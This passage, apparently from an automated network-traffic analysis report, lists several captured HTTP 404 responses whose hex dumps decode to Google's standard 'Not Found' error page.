28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:18:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 